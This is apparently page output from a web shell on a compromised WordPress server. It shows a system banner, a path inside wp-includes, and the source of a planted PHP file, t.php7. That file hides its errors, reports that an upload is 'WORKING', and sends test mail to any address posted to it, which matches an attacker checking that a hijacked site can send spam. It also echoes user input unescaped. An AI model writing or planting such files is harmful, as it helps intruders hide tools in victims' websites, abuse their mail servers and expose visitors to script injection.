Linux hkvL61zh9Vexzf 3.10.0-957.1.3.el7.x86_64 #1 SMP Thu Nov 29 14:49:43 UTC 2018 x86_64 Path : /www/wwwroot/fashion-kingdom.com/wp-includes/block-bindings/ |
Current File : /www/wwwroot/fashion-kingdom.com/wp-includes/block-bindings/t.php7 |
<?php error_reporting(0); ?> Upload is <b><color>WORKING</color></b><br> Check Mailling ..<br> <form method="post"> <input type="text" name="email" value="<?php print $_POST['email']?>"required > <input type="submit" value="Send test >>"> </form> <br> <?php if (!empty($_POST['email'])){ $xx = rand(); @mail($_POST['email'],"Result Report Test - ".$xx,"WORKING !"); print "<b>send an report to [".$_POST['email']."] - $xx</b>"; } ?>